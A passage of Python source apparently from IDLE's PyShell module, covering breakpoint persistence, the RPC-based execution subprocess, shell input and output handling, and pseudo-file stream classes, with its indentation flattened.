theme = idleConf.GetOption('main','Theme','name')
cfg = idleConf.GetHighlight(theme, "break")
else:
cfg = {'foreground': '', 'background': ''}
self.text.tag_config('BREAK', cfg)
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
i = self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text.
# Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
except OSError:
lines = []
try:
with open(self.breakpointPath, "w") as new_file:
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
except OSError as err:
if not getattr(self.root, "breakpoint_error_displayed", False):
self.root.breakpoint_error_displayed = True
tkMessageBox.showerror(title='IDLE Error',
message='Unable to update breakpoint list:\n%s'
% str(err),
parent=self.text)
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
if self.io is None:
# can happen if IDLE closes due to the .update() call
return
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index].string))
end = int(float(ranges[index+1].string))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.GetOption('main','Theme','name')
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
def removecolors(self):
# Don't remove shell color tags before "iomark"
for tag in self.tagdefs:
self.tag_remove(tag, "iomark", "end")
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = None
self.port = PORT
self.original_compiler_flags = self.compile.compiler.flags
_afterid = None
rpcclt = None
rpcsubproc = None
def spawn_subprocess(self):
if self.subprocess_arglist is None:
self.subprocess_arglist = self.build_subprocess_arglist()
self.rpcsubproc = subprocess.Popen(self.subprocess_arglist)
def build_subprocess_arglist(self):
assert (self.port!=0), (
"Socket should have been assigned a port number.")
w = ['-W' + s for s in sys.warnoptions]
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
if __name__ == 'idlelib.PyShell':
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
return [sys.executable] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
addr = (HOST, self.port)
# GUI makes several attempts to acquire socket, listens for connection
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except OSError as err:
pass
else:
self.display_port_binding_error()
return None
# if PORT was 0, system will assign an 'ephemeral' port. Find it out:
self.port = self.rpcclt.listening_sock.getsockname()[1]
# if PORT was not 0, probably working with a remote execution server
if PORT != 0:
# To allow reconnection within the 2MSL wait (cf. Stevens TCP
# V1, 18.6), set SO_REUSEADDR. Note that this can be problematic
# on Windows since the implementation allows two active sockets on
# the same address!
self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout as err:
self.display_no_subprocess_error()
return None
self.rpcclt.register("console", self.tkconsole)
self.rpcclt.register("stdin", self.tkconsole.stdin)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path(with_cwd=True)
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self, with_cwd=False):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
RemoteDebugger.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.terminate_subprocess()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout as err:
self.display_no_subprocess_error()
return None
self.transfer_path(with_cwd=with_cwd)
console.stop_readline()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
if was_executing:
console.write('\n')
console.showprompt()
halfbar = ((int(console.width) - 16) // 2) * '='
console.write(halfbar + ' RESTART ' + halfbar)
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
gui = RemoteDebugger.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.compile.compiler.flags = self.original_compiler_flags
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
if self._afterid is not None:
self.tkconsole.text.after_cancel(self._afterid)
try:
self.rpcclt.listening_sock.close()
except AttributeError: # no socket
pass
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.terminate_subprocess()
self.tkconsole.executing = False
self.rpcclt = None
def terminate_subprocess(self):
"Make sure subprocess is terminated"
try:
self.rpcsubproc.kill()
except OSError:
# process already terminated
return
else:
try:
self.rpcsubproc.wait()
except OSError:
return
def transfer_path(self, with_cwd=False):
if with_cwd: # Issue 13506
path = [''] # include Current Working Directory
path.extend(sys.path)
else:
path = sys.path
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, OSError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print(repr(what), file=console)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "PyShell.ModifiedInterpreter: Subprocess ERROR:\n"
print(errmsg, what, file=sys.__stderr__)
print(errmsg, what, file=console)
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self._afterid = self.tkconsole.text.after(
self.tkconsole.pollinterval, self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
from idlelib import RemoteObjectBrowser
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid)
from idlelib.TreeWidget import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.GetOption('main','Theme','name')
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
with tokenize.open(filename) as fp:
source = fp.read()
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
print('*** Error in script or command!\n'
'Traceback (most recent call last):',
file=self.tkconsole.stderr)
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
# at the moment, InteractiveInterpreter expects str
assert isinstance(source, str)
#if isinstance(source, str):
# from idlelib import IOBinding
# try:
# source = source.encode(IOBinding.encoding)
# except UnicodeError:
# self.tkconsole.resetoutput()
# self.write("Unsupported characters in input\n")
# return
try:
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Override Interactive Interpreter method: Use Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
tkconsole = self.tkconsole
text = tkconsole.text
text.tag_remove("ERROR", "1.0", "end")
type, value, tb = sys.exc_info()
msg = getattr(value, 'msg', '') or value or "<no detail available>"
lineno = getattr(value, 'lineno', '') or 1
offset = getattr(value, 'offset', '') or 0
if offset == 0:
lineno += 1 #mark end of offending line
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
tkconsole.colorize_syntax_error(text, pos)
tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % msg)
tkconsole.showprompt()
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in list(c.keys()):
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec(code, self.locals)
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.interp.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec(code, self.locals)
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
master=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print("IDLE internal error in runcode()",
file=self.tkconsole.stderr)
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print("KeyboardInterrupt", file=self.tkconsole.stderr)
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
return self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind to a TCP/IP port, which is necessary to "
"communicate with its Python execution server. This might be "
"because no networking is installed on this computer. "
"Run IDLE with the -n command line switch to start without a "
"subprocess and refer to Help/IDLE Help 'Running without a "
"subprocess' for further details.",
master=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Startup Error",
"IDLE's subprocess didn't make connection. Either IDLE can't "
"start a subprocess or personal firewall software is blocking "
"the connection.",
master=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
master=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "Python " + python_version() + " Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("windows", "_Windows"),
("help", "_Help"),
]
if sys.platform == "darwin":
menu_specs[-2] = ("windows", "_Window")
# New classes
from idlelib.IdleHistory import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
#
OutputWindow.__init__(self, flist, None, None)
#
## self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.context_use_ps1 = True
#
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
#
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
from idlelib import IOBinding
self.stdin = PseudoInputFile(self, "stdin", IOBinding.encoding)
self.stdout = PseudoOutputFile(self, "stdout", IOBinding.encoding)
self.stderr = PseudoOutputFile(self, "stderr", IOBinding.encoding)
self.console = PseudoOutputFile(self, "console", IOBinding.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self.stdin
try:
# page help() text to shell.
import pydoc # import must be done here to capture i/o rebinding.
# XXX KBK 27Dec07 use a textView someday, but must work w/o subproc
pydoc.pager = pydoc.plainpager
except:
sys.stderr = sys.__stderr__
raise
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
_stop_readline_flag = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
master=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
RemoteDebugger.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
sys.ps1 = ">>> "
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = Debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = "[DEBUG ON]\n>>> "
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"The program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
self.stop_readline()
self.canceled = True
self.closing = True
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "copyright", "credits" or "license()" for more information.'
def begin(self):
self.text.mark_set("iomark", "insert")
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = ("==== No Subprocess ====\n\n" +
"WARNING: Running IDLE without a Subprocess is deprecated\n" +
"and will be removed in a later version. See Help/IDLE Help\n" +
"for details.\n\n")
sys.displayhook = rpc.displayhook
self.write("Python %s on %s\n%s\n%s" %
(sys.version, sys.platform, self.COPYRIGHT, nosub))
self.showprompt()
import tkinter
tkinter._default_root = None # 03Jan04 KBK What's this?
return True
def stop_readline(self):
if not self.reading: # no nested mainloop to exit.
return
self._stop_readline_flag = True
self.top.quit()
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
if self._stop_readline_flag:
self._stop_readline_flag = False
return ""
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
# (but only if this before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
more = self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
master=self.text)
return
from idlelib.StackViewer import StackBrowser
sv = StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
"Callback for Run/Restart Shell Cntl-F6"
self.interp.restart_subprocess(with_cwd=True)
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ""
self.console.write(s)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
def write(self, s, tags=()):
if isinstance(s, str) and len(s) and max(s) > '\uffff':
# Tk doesn't support outputting non-BMP characters
# Let's assume what printed string is not very long,
# find first non-BMP character and construct informative
# UnicodeEncodeError exception.
for start, char in enumerate(s):
if char > '\uffff':
break
raise UnicodeEncodeError("UCS-2", char, start, start+1,
'Non-BMP character not supported in Tk')
try:
self.text.mark_gravity("iomark", "right")
count = OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
raise ###pass # ### 11Aug07 KBK if we are expecting exceptions
# let's find out what they are and be specific.
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
return count
def rmenu_check_cut(self):
try:
if self.text.compare('sel.first', '<', 'iomark'):
return 'disabled'
except TclError: # no selection, so the index 'sel.first' doesn't exist
return 'disabled'
return super().rmenu_check_cut()
def rmenu_check_paste(self):
if self.text.compare('insert','<','iomark'):
return 'disabled'
return super().rmenu_check_paste()
class PseudoFile(io.TextIOBase):
def __init__(self, shell, tags, encoding=None):
self.shell = shell
self.tags = tags
self._encoding = encoding
@property
def encoding(self):
return self._encoding
@property
def name(self):
return '<%s>' % self.tags
def isatty(self):
return True
class PseudoOutputFile(PseudoFile):
def writable(self):
return True
def write(self, s):
if self.closed:
raise ValueError("write to closed file")
if type(s) is not str:
if not isinstance(s, str):
raise TypeError('must be str, not ' + type(s).__name__)
# See issue #19481
s = str.__str__(s)
return self.shell.write(s, self.tags)
class PseudoInputFile(PseudoFile):
def __init__(self, shell, tags, encoding=None):
PseudoFile.__init__(self, shell, tags, encoding)
self._line_buffer = ''
def readable(self):
return True
def read(self, size=-1):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
elif not isinstance(size, int):
raise TypeError('must be int, not ' + type(size).__name__)
result = self._line_buffer
self._line_buffer = ''
if size < 0:
while True:
line = self.shell.readline()
if not line: break
result += line
else:
while len(result) < size:
line = self.shell.readline()
if not line: break
result += line
self._line_buffer = result[size:]
result = result[:size]
return result
def readline(self, size=-1):
if self.closed:
raise ValueError("read from closed file")
if size is None:
size = -1
elif not isinstance(size, int):
raise TypeError('must be int, not ' + type(size).__name__)
line = self._line_buffer or self.shell.readline()
if size < 0:
size = len(line)
eol = line.find('\n', 0, size)
if eol >= 0:
size = eol + 1
self._line_buffer = line[size:]
return line[:size]
def close(self):
self.shell.close()
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (DEPRECATED,
see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
